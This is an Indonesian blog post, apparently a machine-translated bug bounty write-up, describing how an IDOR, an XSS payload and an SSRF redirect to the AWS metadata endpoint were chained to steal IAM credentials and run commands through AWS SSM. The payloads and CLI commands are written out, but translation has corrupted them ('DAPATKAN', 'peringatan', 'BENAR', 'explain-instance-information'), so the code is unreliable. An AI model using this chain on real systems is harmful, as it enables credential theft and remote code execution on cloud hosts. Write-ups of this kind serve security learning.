Ssrf to rce MEDIUM WRITEUP

Selasa, 06 September 2022 Tambah Komentar Edit



SSRF hacktrick

SSRF Writeup

Blind ssrf automation

Sentry SSRF

Find SSRF

Gopher SSRF


 Hai kawan,


Saya selalu percaya bahwa berbagi itu peduli, Jadi saya memutuskan untuk membagikan temuan terbaru saya kepada Anda karena dapat membantu orang lain yang memulai perjalanan Bug Bounty. Hari ini saya akan memberi tahu Anda bagaimana saya menemukan RCE pertama saya.


Selama berburu, saya menemukan IDOR dan dapat melihat semua PII pengunjung Termasuk gambar.


Permintaan IDOR:


DAPATKAN /pengunjung/?start_date=01/01/2021&end_date=07/23/2022&first_name=&last_name=&date_of_birth=&status=&reason_for_visit=&reason_for_visit_text=&start_record=0&total_record=10&selected_building_id=&building_id=subdomain HTTP/

2.io


Parameter “building_id” rentan terhadap IDOR. Nilai Parameter ini adalah nilai numerik, Jadi mudah untuk mengambil informasi pengguna lain. Ketika saya memeriksa informasi pengguna, saya melihat ada satu contoh tautan: https://subs.example.io/s3File?url=https://s3-us-west-1.amazon.com/filename.jpeg , Ini mengambil gambar pengguna dari ember amazon s3. Sekarang perhatian penuh saya ada di sana. Karena itu titik akhir Juicy dengan parameter ?url=.



Langkah pertama


Saya mencoba https://subs.example.io/s3File?url=https://google.com/. Bingo, itu menunjukkan halaman indeks google. Kemudian saya mencoba untuk mencetak sesuatu di sana, tetapi ketika saya mencoba untuk mencetak sesuatu yang lain itu tidak bekerja, penyelidikan lebih lanjut saya perhatikan "?url=" itu hanya memungkinkan halaman indeks. Kemudian saya meng-host kode ini di server dan saya mendapatkan XSS di sana.


“><img src=x onerror=peringatan(document.domain);>{{7*7}}


Saya melaporkannya di h1 dan HackerOne triage memperbarui tingkat keparahan ke Medium (4.7).




Suatu hari nanti


Saya dapat mengeskalasi ini ke SSRF yang sudah dibaca penuh.


Seperti yang saya sebutkan di atas "?url=" Parameter hanya diperbolehkan index. Saya meng-host kode ini ke indeks server saya


<?php header('Location: https://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-service-role-ssm-codedeploy' , BENAR, 303); ?>


Mendapatkan kunci AWS: https://subs.example.io/s3File?url=https://ssrf.hosted.site/

Saya mendapatkan SSRF baca lengkap untuk me-root RCE pada instans AWS apa pun


Sekarang saya harus Mengonfigurasi AWS CLI


ekspor AWS_ACCESS_KEY_ID=

ekspor AWS_SECRET_ACCESS_KEY=

ekspor AWS_DEFAULT_REGION=us-barat-1

ekspor AWS_SESSION_TOKEN=


Sekarang terapkan perintah ini aws ssm explain-instance-information — output text — query “InstanceInformationList[*]” untuk mencari tahu semua instance dan menyalin semua instance yang formatnya seperti i-0a9e9b8343511285db9


Sekarang terapkan perintah ini dengan instanceid


aws ssm send-command — nama dokumen “AWS-RunShellScript” — komentar “RCE” — menargetkan “Key=instanceids,Values=instanceid” — parameter 'commands=uname -a'


Source





Berlangganan update artikel terbaru via email:

Belum ada Komentar untuk "Ssrf to rce MEDIUM WRITEUP"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel